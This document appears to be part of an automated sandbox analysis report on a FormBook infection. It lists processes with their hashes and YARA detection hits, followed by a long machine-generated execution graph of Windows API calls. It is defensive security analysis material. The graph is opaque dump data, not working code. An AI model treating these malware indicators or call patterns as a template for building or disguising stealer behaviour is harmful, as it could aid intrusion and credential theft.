                                                                  Start date:04/12/2024
                                                                  Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                                  Imagebase:0xa30000
                                                                  File size:186'880 bytes
                                                                  MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:7
                                                                  Start time:06:49:25
                                                                  Start date:04/12/2024
                                                                  Path:C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe"
                                                                  Imagebase:0xa00000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:8
                                                                  Start time:06:49:37
                                                                  Start date:04/12/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6bf500000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:3.2%
                                                                    Dynamic/Decrypted Code Coverage:1.3%
                                                                    Signature Coverage:8.5%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:147
                                                                    execution_graph 103364 c13633 103365 c1366a 103364->103365 103366 c136e7 103365->103366 103367 c13688 103365->103367 103403 c136e5 103365->103403 103371 c4d0cc 103366->103371 103372 c136ed 103366->103372 103368 c13695 103367->103368 103369 c1374b PostQuitMessage 103367->103369 103374 c4d154 103368->103374 103375 c136a0 103368->103375 103406 c136d8 103369->103406 103370 c136ca DefWindowProcW 103370->103406 103413 c21070 10 API calls Mailbox 103371->103413 103376 c136f2 103372->103376 103377 c13715 SetTimer RegisterWindowMessageW 103372->103377 103429 c72527 71 API calls _memset 103374->103429 103379 c13755 103375->103379 103380 c136a8 103375->103380 103383 c136f9 KillTimer 103376->103383 103384 c4d06f 103376->103384 103381 c1373e CreatePopupMenu 103377->103381 103377->103406 103378 c4d0f3 103414 c21093 331 API calls Mailbox 103378->103414 103411 c144a0 64 API calls _memset 103379->103411 103387 c136b3 103380->103387 103388 c4d139 103380->103388 103381->103406 103409 c1443a Shell_NotifyIconW _memset 103383->103409 103391 c4d074 103384->103391 103392 c4d0a8 MoveWindow 103384->103392 103394 c136be 103387->103394 103395 c4d124 103387->103395 103388->103370 103428 c67c36 59 API calls Mailbox 103388->103428 103389 c4d166 103389->103370 103389->103406 103397 c4d097 SetFocus 103391->103397 103398 c4d078 103391->103398 103392->103406 103393 c1370c 103410 c13114 DeleteObject DestroyWindow Mailbox 103393->103410 103394->103370 103415 c1443a Shell_NotifyIconW _memset 103394->103415 103427 c72d36 81 API calls _memset 103395->103427 103396 c13764 103396->103406 103397->103406 103398->103394 103401 c4d081 103398->103401 103412 c21070 10 API calls Mailbox 103401->103412 103403->103370 103407 c4d118 103416 c1434a 103407->103416 103409->103393 103410->103406 103411->103396 103412->103406 103413->103378 103414->103394 103415->103407 103417 c14375 _memset 103416->103417 103430 c14182 103417->103430 103420 c143fa 103422 c14430 Shell_NotifyIconW 103420->103422 103423 c14414 Shell_NotifyIconW 103420->103423 103424 c14422 103422->103424 103423->103424 103434 c1407c 103424->103434 103426 c14429 103426->103403 103427->103396 103428->103403 103429->103389 103431 c4d423 103430->103431 103432 c14196 103430->103432 103431->103432 103433 c4d42c DestroyIcon 103431->103433 103432->103420 103456 c72f94 62 API calls _W_store_winword 103432->103456 103433->103432 103435 c14098 103434->103435 103455 c1416f Mailbox 103434->103455 103457 c17a16 103435->103457 103438 c140b3 103462 c17bcc 103438->103462 103439 c4d3c8 LoadStringW 103442 c4d3e2 103439->103442 103441 c140c8 103441->103442 103443 c140d9 103441->103443 103444 c17b2e 59 API calls 103442->103444 103445 c140e3 103443->103445 103446 c14174 103443->103446 103449 c4d3ec 103444->103449 103471 c17b2e 103445->103471 103480 c18047 103446->103480 103452 c140ed _memset _wcscpy 103449->103452 103484 c17cab 103449->103484 103451 c4d40e 103454 c17cab 59 API calls 103451->103454 103453 c14155 Shell_NotifyIconW 103452->103453 103453->103455 103454->103452 103455->103426 103456->103420 103491 c30db6 103457->103491 103459 c17a3b 103501 c18029 103459->103501 103463 c17c45 103462->103463 103464 c17bd8 __wsetenvp 103462->103464 103533 c17d2c 103463->103533 103467 c17c13 103464->103467 103468 c17bee 103464->103468 103466 c17bf6 _memmove 103466->103441 103469 c18029 59 API calls 103467->103469 103532 c17f27 59 API calls Mailbox 103468->103532 103469->103466 103472 c17b40 103471->103472 103473 c4ec6b 103471->103473 103541 c17a51 103472->103541 103547 c67bdb 59 API calls _memmove 103473->103547 103476 c17b4c 103476->103452 103477 c4ec75 103478 c18047 59 API calls 103477->103478 103479 c4ec7d Mailbox 103478->103479 103481 c18052 103480->103481 103482 c1805a 103480->103482 103548 c17f77 59 API calls 2 library calls 103481->103548 103482->103452 103485 c4ed4a 103484->103485 103486 c17cbf 103484->103486 103487 c18029 59 API calls 103485->103487 103549 c17c50 103486->103549 103490 c4ed55 __wsetenvp _memmove 103487->103490 103489 c17cca 103489->103451 103493 c30dbe 103491->103493 103494 c30dd8 103493->103494 103496 c30ddc std::exception::exception 103493->103496 103504 c3571c 103493->103504 103521 c333a1 DecodePointer 103493->103521 103494->103459 103522 c3859b RaiseException 103496->103522 103498 c30e06 103523 c384d1 58 API calls _free 103498->103523 103500 c30e18 103500->103459 103502 c30db6 Mailbox 59 API calls 103501->103502 103503 c140a6 103502->103503 103503->103438 103503->103439 103505 c35797 103504->103505 103512 c35728 103504->103512 103530 c333a1 DecodePointer 103505->103530 103507 c3579d 103531 c38b28 58 API calls __getptd_noexit 103507->103531 103510 c3575b RtlAllocateHeap 103510->103512 103520 c3578f 103510->103520 103512->103510 103513 c35733 103512->103513 103514 c35783 103512->103514 103518 c35781 103512->103518 103527 c333a1 DecodePointer 103512->103527 103513->103512 103524 c3a16b 58 API calls 2 library calls 103513->103524 103525 c3a1c8 58 API calls 8 library calls 103513->103525 103526 c3309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103513->103526 103528 c38b28 58 API calls __getptd_noexit 103514->103528 103529 c38b28 58 API calls __getptd_noexit 103518->103529 103520->103493 103521->103493 103522->103498 103523->103500 103524->103513 103525->103513 103527->103512 103528->103518 103529->103520 103530->103507 103531->103520 103532->103466 103534 c17d3a 103533->103534 103536 c17d43 _memmove 103533->103536 103534->103536 103537 c17e4f 103534->103537 103536->103466 103538 c17e62 103537->103538 103540 c17e5f _memmove 103537->103540 103539 c30db6 Mailbox 59 API calls 103538->103539 103539->103540 103540->103536 103542 c17a5f 103541->103542 103543 c17a85 _memmove 103541->103543 103542->103543 103544 c30db6 Mailbox 59 API calls 103542->103544 103543->103476 103545 c17ad4 103544->103545 103546 c30db6 Mailbox 59 API calls 103545->103546 103546->103543 103547->103477 103548->103482 103550 c17c5f __wsetenvp 103549->103550 103551 c18029 59 API calls 103550->103551 103552 c17c70 _memmove 103550->103552 103553 c4ed07 _memmove 103551->103553 103552->103489 103554 c11055 103559 c12649 103554->103559 103570 c17667 103559->103570 103563 c4c069 103565 c12754 103565->103563 103566 c1105a 103565->103566 103578 c13416 59 API calls 2 library calls 103565->103578 103567 c32d40 103566->103567 103586 c32c44 103567->103586 103569 c11064 103571 c30db6 Mailbox 59 API calls 103570->103571 103572 c17688 103571->103572 103573 c30db6 Mailbox 59 API calls 103572->103573 103574 c126b7 103573->103574 103575 c13582 103574->103575 103579 c135b0 103575->103579 103578->103565 103580 c135bd 103579->103580 103581 c135a1 103579->103581 103580->103581 103582 c135c4 RegOpenKeyExW 103580->103582 103581->103565 103582->103581 103583 c135de RegQueryValueExW 103582->103583 103584 c13614 RegCloseKey 103583->103584 103585 c135ff 103583->103585 103584->103581 103585->103584 103587 c32c50 __setmbcp 103586->103587 103594 c33217 103587->103594 103593 c32c77 __setmbcp 103593->103569 103611 c39c0b 103594->103611 103596 c32c59 103597 c32c88 DecodePointer DecodePointer 103596->103597 103598 c32c65 103597->103598 103599 c32cb5 103597->103599 103608 c32c82 103598->103608 103599->103598 103657 c387a4 59 API calls __wopenfile 103599->103657 103601 c32d18 EncodePointer EncodePointer 103601->103598 103602 c32cec 103602->103598 103607 c32d06 EncodePointer 103602->103607 103659 c38864 61 API calls 2 library calls 103602->103659 103603 c32cc7 103603->103601 103603->103602 103658 c38864 61 API calls 2 library calls 103603->103658 103606 c32d00 103606->103598 103606->103607 103607->103601 103660 c33220 103608->103660 103612 c39c2f EnterCriticalSection 103611->103612 103613 c39c1c 103611->103613 103612->103596 103618 c39c93 103613->103618 103615 c39c22 103615->103612 103642 c330b5 58 API calls 3 library calls 103615->103642 103619 c39c9f __setmbcp 103618->103619 103620 c39ca8 103619->103620 103621 c39cc0 103619->103621 103643 c3a16b 58 API calls 2 library calls 103620->103643 103629 c39ce1 __setmbcp 103621->103629 103646 c3881d 58 API calls __malloc_crt 103621->103646 103624 c39cad 103644 c3a1c8 58 API calls 8 library calls 103624->103644 103625 c39cd5 103627 c39ceb 103625->103627 103628 c39cdc 103625->103628 103632 c39c0b __lock 58 API calls 103627->103632 103647 c38b28 58 API calls __getptd_noexit 103628->103647 103629->103615 103630 c39cb4 103645 c3309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103630->103645 103635 c39cf2 103632->103635 103636 c39d17 103635->103636 103637 c39cff 103635->103637 103649 c32d55 103636->103649 103648 c39e2b InitializeCriticalSectionAndSpinCount 103637->103648 103640 c39d0b 103655 c39d33 LeaveCriticalSection _doexit 103640->103655 103643->103624 103644->103630 103646->103625 103647->103629 103648->103640 103650 c32d87 __dosmaperr 103649->103650 103651 c32d5e RtlFreeHeap 103649->103651 103650->103640 103651->103650 103652 c32d73 103651->103652 103656 c38b28 58 API calls __getptd_noexit 103652->103656 103654 c32d79 GetLastError 103654->103650 103655->103629 103656->103654 103657->103603 103658->103602 103659->103606 103663 c39d75 LeaveCriticalSection 103660->103663 103662 c32c87 103662->103593 103663->103662 103664 c37c56 103665 c37c62 __setmbcp 103664->103665 103701 c39e08 GetStartupInfoW 103665->103701 103667 c37c67 103703 c38b7c GetProcessHeap 103667->103703 103669 c37cbf 103670 c37cca 103669->103670 103786 c37da6 58 API calls 3 library calls 103669->103786 103704 c39ae6 103670->103704 103673 c37cd0 103674 c37cdb __RTC_Initialize 103673->103674 103787 c37da6 58 API calls 3 library calls 103673->103787 103725 c3d5d2 103674->103725 103677 c37cea 103678 c37cf6 GetCommandLineW 103677->103678 103788 c37da6 58 API calls 3 library calls 103677->103788 103744 c44f23 GetEnvironmentStringsW 103678->103744 103681 c37cf5 103681->103678 103684 c37d10 103685 c37d1b 103684->103685 103789 c330b5 58 API calls 3 library calls 103684->103789 103754 c44d58 103685->103754 103688 c37d21 103689 c37d2c 103688->103689 103790 c330b5 58 API calls 3 library calls 103688->103790 103768 c330ef 103689->103768 103692 c37d34 103693 c37d3f __wwincmdln 103692->103693 103791 c330b5 58 API calls 3 library calls 103692->103791 103774 c147d0 103693->103774 103696 c37d53 103697 c37d62 103696->103697 103792 c33358 58 API calls _doexit 103696->103792 103793 c330e0 58 API calls _doexit 103697->103793 103700 c37d67 __setmbcp 103702 c39e1e 103701->103702 103702->103667 103703->103669 103794 c33187 36 API calls 2 library calls 103704->103794 103706 c39aeb 103795 c39d3c InitializeCriticalSectionAndSpinCount __ioinit 103706->103795 103708 c39af0 103709 c39af4 103708->103709 103797 c39d8a TlsAlloc 103708->103797 103796 c39b5c 61 API calls 2 library calls 103709->103796 103712 c39af9 103712->103673 103713 c39b06 103713->103709 103714 c39b11 103713->103714 103798 c387d5 103714->103798 103717 c39b53 103806 c39b5c 61 API calls 2 library calls 103717->103806 103720 c39b32 103720->103717 103722 c39b38 103720->103722 103721 c39b58 103721->103673 103805 c39a33 58 API calls 4 library calls 103722->103805 103724 c39b40 GetCurrentThreadId 103724->103673 103726 c3d5de __setmbcp 103725->103726 103727 c39c0b __lock 58 API calls 103726->103727 103728 c3d5e5 103727->103728 103729 c387d5 __calloc_crt 58 API calls 103728->103729 103731 c3d5f6 103729->103731 103730 c3d661 GetStartupInfoW 103733 c3d676 103730->103733 103734 c3d7a5 103730->103734 103731->103730 103732 c3d601 @_EH4_CallFilterFunc@8 __setmbcp 103731->103732 103732->103677 103733->103734 103736 c3d6c4 103733->103736 103738 c387d5 __calloc_crt 58 API calls 103733->103738 103735 c3d86d 103734->103735 103739 c3d7f2 GetStdHandle 103734->103739 103740 c3d805 GetFileType 103734->103740 103819 c39e2b InitializeCriticalSectionAndSpinCount 103734->103819 103820 c3d87d LeaveCriticalSection _doexit 103735->103820 103736->103734 103741 c3d6f8 GetFileType 103736->103741 103818 c39e2b InitializeCriticalSectionAndSpinCount 103736->103818 103738->103733 103739->103734 103740->103734 103741->103736 103745 c44f34 103744->103745 103746 c37d06 103744->103746 103821 c3881d 58 API calls __malloc_crt 103745->103821 103750 c44b1b GetModuleFileNameW 103746->103750 103748 c44f5a _memmove 103749 c44f70 FreeEnvironmentStringsW 103748->103749 103749->103746 103751 c44b4f _wparse_cmdline 103750->103751 103753 c44b8f _wparse_cmdline 103751->103753 103822 c3881d 58 API calls __malloc_crt 103751->103822 103753->103684 103755 c44d71 __wsetenvp 103754->103755 103759 c44d69 103754->103759 103756 c387d5 __calloc_crt 58 API calls 103755->103756 103764 c44d9a __wsetenvp 103756->103764 103757 c44df1 103758 c32d55 _free 58 API calls 103757->103758 103758->103759 103759->103688 103760 c387d5 __calloc_crt 58 API calls 103760->103764 103761 c44e16 103762 c32d55 _free 58 API calls 103761->103762 103762->103759 103764->103757 103764->103759 103764->103760 103764->103761 103765 c44e2d 103764->103765 103823 c44607 58 API calls __wopenfile 103764->103823 103824 c38dc6 IsProcessorFeaturePresent 103765->103824 103767 c44e39 103767->103688 103769 c330fb __IsNonwritableInCurrentImage 103768->103769 103847 c3a4d1 103769->103847 103771 c33119 __initterm_e 103772 c32d40 __cinit 67 API calls 103771->103772 103773 c33138 _doexit __IsNonwritableInCurrentImage 103771->103773 103772->103773 103773->103692 103775 c147ea 103774->103775 103785 c14889 103774->103785 103776 c14824 IsThemeActive 103775->103776 103850 c3336c 103776->103850 103780 c14850 103862 c148fd SystemParametersInfoW SystemParametersInfoW 103780->103862 103782 c1485c 103863 c13b3a 103782->103863 103784 c14864 SystemParametersInfoW 103784->103785 103785->103696 103786->103670 103787->103674 103788->103681 103792->103697 103793->103700 103794->103706 103795->103708 103796->103712 103797->103713 103800 c387dc 103798->103800 103801 c38817 103800->103801 103803 c387fa 103800->103803 103807 c451f6 103800->103807 103801->103717 103804 c39de6 TlsSetValue 103801->103804 103803->103800 103803->103801 103815 c3a132 Sleep 103803->103815 103804->103720 103805->103724 103806->103721 103808 c45201 103807->103808 103812 c4521c 103807->103812 103809 c4520d 103808->103809 103808->103812 103816 c38b28 58 API calls __getptd_noexit 103809->103816 103810 c4522c RtlAllocateHeap 103810->103812 103813 c45212 103810->103813 103812->103810 103812->103813 103817 c333a1 DecodePointer 103812->103817 103813->103800 103815->103803 103816->103813 103817->103812 103818->103736 103819->103734 103820->103732 103821->103748 103822->103753 103823->103764 103825 c38dd1 103824->103825 103830 c38c59 103825->103830 103829 c38dec 103829->103767 103831 c38c73 _memset __call_reportfault 103830->103831 103832 c38c93 IsDebuggerPresent 103831->103832 103838 c3a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 103832->103838 103835 c38d57 __call_reportfault 103839 c3c5f6 103835->103839 103836 c38d7a 103837 c3a140 GetCurrentProcess TerminateProcess 103836->103837 103837->103829 103838->103835 103840 c3c600 IsProcessorFeaturePresent 103839->103840 103841 c3c5fe 103839->103841 103843 c4590a 103840->103843 103841->103836 103846 c458b9 5 API calls 2 library calls 103843->103846 103845 c459ed 103845->103836 103846->103845 103848 c3a4d4 EncodePointer 103847->103848 103848->103848 103849 c3a4ee 103848->103849 103849->103771 103851 c39c0b __lock 58 API calls 103850->103851 103852 c33377 DecodePointer EncodePointer 103851->103852 103915 c39d75 LeaveCriticalSection 103852->103915 103854 c14849 103855 c333d4 103854->103855 103856 c333f8 103855->103856 103857 c333de 103855->103857 103856->103780 103857->103856 103916 c38b28 58 API calls __getptd_noexit 103857->103916 103859 c333e8 103917 c38db6 9 API calls __wopenfile 103859->103917 103861 c333f3 103861->103780 103862->103782 103864 c13b47 __write_nolock 103863->103864 103865 c17667 59 API calls 103864->103865 103866 c13b51 GetCurrentDirectoryW 103865->103866 103918 c13766 103866->103918 103868 c13b7a IsDebuggerPresent 103869 c4d272 MessageBoxA 103868->103869 103870 c13b88 103868->103870 103873 c4d28c 103869->103873 103871 c13c61 103870->103871 103870->103873 103874 c13ba5 103870->103874 103872 c13c68 SetCurrentDirectoryW 103871->103872 103875 c13c75 Mailbox 103872->103875 104117 c17213 59 API calls Mailbox 103873->104117 103999 c17285 103874->103999 103875->103784 103878 c4d29c 103883 c4d2b2 SetCurrentDirectoryW 103878->103883 103880 c13bc3 GetFullPathNameW 103881 c17bcc 59 API calls 103880->103881 103882 c13bfe 103881->103882 104015 c2092d 103882->104015 103883->103875 103886 c13c1c 103887 c13c26 103886->103887 104118 c6874b AllocateAndInitializeSid CheckTokenMembership FreeSid 103886->104118 104031 c13a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 103887->104031 103890 c4d2cf 103890->103887 103893 c4d2e0 103890->103893 104119 c14706 103893->104119 103894 c13c30 103896 c13c43 103894->103896 103898 c1434a 68 API calls 103894->103898 104039 c209d0 103896->104039 103897 c4d2e8 104126 c17de1 103897->104126 103898->103896 103901 c4d2f5 103904 c4d324 103901->103904 103905 c4d2ff 103901->103905 103902 c13c4e 103902->103871 104116 c1443a Shell_NotifyIconW _memset 103902->104116 103906 c17cab 59 API calls 103904->103906 103907 c17cab 59 API calls 103905->103907 103908 c4d320 GetForegroundWindow ShellExecuteW 103906->103908 103909 c4d30a 103907->103909 103912 c4d354 Mailbox 103908->103912 103911 c17b2e 59 API calls 103909->103911 103913 c4d317 103911->103913 103912->103871 103914 c17cab 59 API calls 103913->103914 103914->103908 103915->103854 103916->103859 103917->103861 103919 c17667 59 API calls 103918->103919 103920 c1377c 103919->103920 104130 c13d31 103920->104130 103922 c1379a 103923 c14706 61 API calls 103922->103923 103924 c137ae 103923->103924 103925 c17de1 59 API calls 103924->103925 103926 c137bb 103925->103926 104144 c14ddd 103926->104144 103929 c4d173 104211 c7955b 103929->104211 103930 c137dc Mailbox 103934 c18047 59 API calls 103930->103934 103933 c4d192 103936 c32d55 _free 58 API calls 103933->103936 103937 c137ef 103934->103937 103938 c4d19f 103936->103938 104168 c1928a 103937->104168 103940 c14e4a 84 API calls 103938->103940 103943 c4d1a8 103940->103943 103942 c17de1 59 API calls 103944 c13808 103942->103944 103946 c13ed0 59 API calls 103943->103946 104171 c184c0 103944->104171 103948 c4d1c3 103946->103948 103947 c1381a Mailbox 103949 c17de1 59 API calls 103947->103949 103950 c13ed0 59 API calls 103948->103950 103951 c13840 103949->103951 103952 c4d1df 103950->103952 103953 c184c0 69 API calls 103951->103953 103954 c14706 61 API calls 103952->103954 103956 c1384f Mailbox 103953->103956 103955 c4d204 103954->103955 103957 c13ed0 59 API calls 103955->103957 103959 c17667 59 API calls 103956->103959 103958 c4d210 103957->103958 103960 c18047 59 API calls 103958->103960 103961 c1386d 103959->103961 103963 c4d21e 103960->103963 104175 c13ed0 103961->104175 103964 c13ed0 59 API calls 103963->103964 103966 c4d22d 103964->103966 103972 c18047 59 API calls 103966->103972 103968 c13887 103968->103943 103969 c13891 103968->103969 103970 c32efd _W_store_winword 60 API calls 103969->103970 103971 c1389c 103970->103971 103971->103948 103973 c138a6 103971->103973 103974 c4d24f 103972->103974 103975 c32efd _W_store_winword 60 API calls 103973->103975 103976 c13ed0 59 API calls 103974->103976 103977 c138b1 103975->103977 103978 c4d25c 103976->103978 103977->103952 103979 c138bb 103977->103979 103978->103978 103980 c32efd _W_store_winword 60 API calls 103979->103980 103981 c138c6 103980->103981 103981->103966 103982 c13907 103981->103982 103984 c13ed0 59 API calls 103981->103984 103982->103966 103983 c13914 103982->103983 104191 c192ce 103983->104191 103985 c138ea 103984->103985 103987 c18047 59 API calls 103985->103987 103989 c138f8 103987->103989 103991 c13ed0 59 API calls 103989->103991 103991->103982 103994 c1928a 59 API calls 103996 c1394f 103994->103996 103995 c18ee0 60 API calls 103995->103996 103996->103994 103996->103995 103997 c13ed0 59 API calls 103996->103997 103998 c13995 Mailbox 103996->103998 103997->103996 103998->103868 104000 c17292 __write_nolock 103999->104000 104001 c4ea22 _memset 104000->104001 104002 c172ab 104000->104002 104005 c4ea3e GetOpenFileNameW 104001->104005 104852 c14750 104002->104852 104007 c4ea8d 104005->104007 104009 c17bcc 59 API calls 104007->104009 104010 c4eaa2 104009->104010 104010->104010 104012 c172c9 104880 c1686a 104012->104880 104016 c2093a __write_nolock 104015->104016 105132 c16d80 104016->105132 104018 c2093f 104030 c13c14 104018->104030 105143 c2119e 89 API calls 104018->105143 104020 c2094c 104020->104030 105144 c23ee7 91 API calls Mailbox 104020->105144 104022 c20955 104023 c20959 GetFullPathNameW 104022->104023 104022->104030 104024 c17bcc 59 API calls 104023->104024 104025 c20985 104024->104025 104026 c17bcc 59 API calls 104025->104026 104027 c20992 104026->104027 104028 c54cab _wcscat 104027->104028 104029 c17bcc 59 API calls 104027->104029 104029->104030 104030->103878 104030->103886 104032 c13ab0 LoadImageW RegisterClassExW 104031->104032 104033 c4d261 104031->104033 105181 c13041 7 API calls 104032->105181 105182 c147a0 LoadImageW EnumResourceNamesW 104033->105182 104036 c13b34 104038 c139d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104036->104038 104037 c4d26a 104038->103894 104040 c54cc3 104039->104040 104054 c209f5 104039->104054 105239 c79e4a 89 API calls 4 library calls 104040->105239 104042 c20ce4 104043 c20cfa 104042->104043 105236 c21070 10 API calls Mailbox 104042->105236 104043->103902 104046 c20ee4 104046->104043 104047 c20ef1 104046->104047 105237 c21093 331 API calls Mailbox 104047->105237 104048 c20a4b PeekMessageW 104058 c20a05 Mailbox 104048->104058 104050 c20ef8 LockWindowUpdate DestroyWindow GetMessageW 104050->104043 104053 c20f2a 104050->104053 104052 c54e81 Sleep 104052->104058 104055 c55c58 TranslateMessage DispatchMessageW GetMessageW 104053->104055 104054->104058 105240 c19e5d 60 API calls 104054->105240 105241 c66349 331 API calls 104054->105241 104055->104055 104057 c55c88 104055->104057 104057->104043 104058->104042 104058->104048 104058->104052 104059 c54d50 TranslateAcceleratorW 104058->104059 104060 c20e43 PeekMessageW 104058->104060 104061 c20ea5 TranslateMessage DispatchMessageW 104058->104061 104062 c30db6 59 API calls Mailbox 104058->104062 104063 c20d13 timeGetTime 104058->104063 104064 c5581f WaitForSingleObject 104058->104064 104067 c20e5f Sleep 104058->104067 104068 c18047 59 API calls 104058->104068 104070 c20e70 Mailbox 104058->104070 104071 c55af8 Sleep 104058->104071 104074 c20f95 104058->104074 104076 c20f4e timeGetTime 104058->104076 104082 c1b73c 304 API calls 104058->104082 104095 c19e5d 60 API calls 104058->104095 104098 c19ea0 304 API calls 104058->104098 104103 c79e4a 89 API calls 104058->104103 104105 c19c90 59 API calls Mailbox 104058->104105 104106 c184c0 69 API calls 104058->104106 104108 c6617e 59 API calls Mailbox 104058->104108 104109 c17de1 59 API calls 104058->104109 104110 c189b3 69 API calls 104058->104110 104111 c555d5 VariantClear 104058->104111 104112 c18cd4 59 API calls Mailbox 104058->104112 104113 c5566b VariantClear 104058->104113 104114 c55419 VariantClear 104058->104114 104115 c66e8f 59 API calls 104058->104115 105183 c1e6a0 104058->105183 105214 c1f460 104058->105214 105233 c1e420 331 API calls 104058->105233 105234 c1fce0 331 API calls 2 library calls 104058->105234 105235 c131ce IsDialogMessageW GetClassLongW 104058->105235 105242 c96018 59 API calls 104058->105242 105243 c79a15 59 API calls Mailbox 104058->105243 105244 c6d4f2 59 API calls 104058->105244 105245 c19837 104058->105245 105263 c660ef 59 API calls 2 library calls 104058->105263 105264 c18401 59 API calls 104058->105264 105265 c182df 59 API calls Mailbox 104058->105265 104059->104058 104059->104060 104060->104058 104061->104060 104062->104058 104063->104058 104064->104058 104066 c5583c GetExitCodeProcess CloseHandle 104064->104066 104066->104074 104067->104070 104068->104058 104069 c17667 59 API calls 104069->104070 104070->104058 104070->104069 104070->104074 104075 c3049f timeGetTime 104070->104075 104080 c55b8f GetExitCodeProcess 104070->104080 104084 c95f25 110 API calls 104070->104084 104085 c1b7dd 109 API calls 104070->104085 104088 c55874 104070->104088 104089 c55c17 Sleep 104070->104089 104090 c55078 Sleep 104070->104090 104092 c17de1 59 API calls 104070->104092 105266 c72408 60 API calls 104070->105266 105267 c19e5d 60 API calls 104070->105267 105268 c189b3 69 API calls Mailbox 104070->105268 105269 c1b73c 331 API calls 104070->105269 105270 c664da 60 API calls 104070->105270 105271 c75244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104070->105271 105272 c73c55 66 API calls Mailbox 104070->105272 104071->104070 104074->103902 104075->104070 105238 c19e5d 60 API calls 104076->105238 104086 c55ba5 WaitForSingleObject 104080->104086 104087 c55bbb CloseHandle 104080->104087 104082->104058 104084->104070 104085->104070 104086->104058 104086->104087 104087->104070 104088->104074 104089->104058 104090->104058 104092->104070 104095->104058 104098->104058 104103->104058 104105->104058 104106->104058 104108->104058 104109->104058 104110->104058 104111->104058 104112->104058 104113->104058 104114->104058 104115->104058 104116->103871 104117->103878 104118->103890 104120 c41940 __write_nolock 104119->104120 104121 c14713 GetModuleFileNameW 104120->104121 104122 c17de1 59 API calls 104121->104122 104123 c14739 104122->104123 104124 c14750 60 API calls 104123->104124 104125 c14743 Mailbox 104124->104125 104125->103897 104127 c17df0 __wsetenvp _memmove 104126->104127 104128 c30db6 Mailbox 59 API calls 104127->104128 104129 c17e2e 104128->104129 104129->103901 104131 c13d3e __write_nolock 104130->104131 104132 c17bcc 59 API calls 104131->104132 104137 c13ea4 Mailbox 104131->104137 104134 c13d70 104132->104134 104143 c13da6 Mailbox 104134->104143 104252 c179f2 104134->104252 104135 c179f2 59 API calls 104135->104143 104136 c13e77 104136->104137 104138 c17de1 59 API calls 104136->104138 104137->103922 104140 c13e98 104138->104140 104139 c17de1 59 API calls 104139->104143 104141 c13f74 59 API calls 104140->104141 104141->104137 104143->104135 104143->104136 104143->104137 104143->104139 104255 c13f74 104143->104255 104261 c14bb5 104144->104261 104149 c4d8e6 104152 c14e4a 84 API calls 104149->104152 104150 c14e08 LoadLibraryExW 104271 c14b6a 104150->104271 104154 c4d8ed 104152->104154 104156 c14b6a 3 API calls 104154->104156 104158 c4d8f5 104156->104158 104157 c14e2f 104157->104158 104159 c14e3b 104157->104159 104297 c14f0b 104158->104297 104160 c14e4a 84 API calls 104159->104160 104163 c137d4 104160->104163 104163->103929 104163->103930 104165 c4d91c 104305 c14ec7 104165->104305 104167 c4d929 104169 c30db6 Mailbox 59 API calls 104168->104169 104170 c137fb 104169->104170 104170->103942 104173 c184cb 104171->104173 104172 c184f2 104172->103947 104173->104172 104559 c189b3 69 API calls Mailbox 104173->104559 104176 c13ef3 104175->104176 104177 c13eda 104175->104177 104179 c17bcc 59 API calls 104176->104179 104178 c18047 59 API calls 104177->104178 104180 c13879 104178->104180 104179->104180 104181 c32efd 104180->104181 104182 c32f09 104181->104182 104183 c32f7e 104181->104183 104190 c32f2e 104182->104190 104560 c38b28 58 API calls __getptd_noexit 104182->104560 104562 c32f90 60 API calls 3 library calls 104183->104562 104186 c32f8b 104186->103968 104187 c32f15 104561 c38db6 9 API calls __wopenfile 104187->104561 104189 c32f20 104189->103968 104190->103968 104192 c192d6 104191->104192 104193 c30db6 Mailbox 59 API calls 104192->104193 104194 c192e4 104193->104194 104195 c13924 104194->104195 104563 c191fc 104194->104563 104197 c19050 104195->104197 104566 c19160 104197->104566 104199 c1905f 104200 c30db6 Mailbox 59 API calls 104199->104200 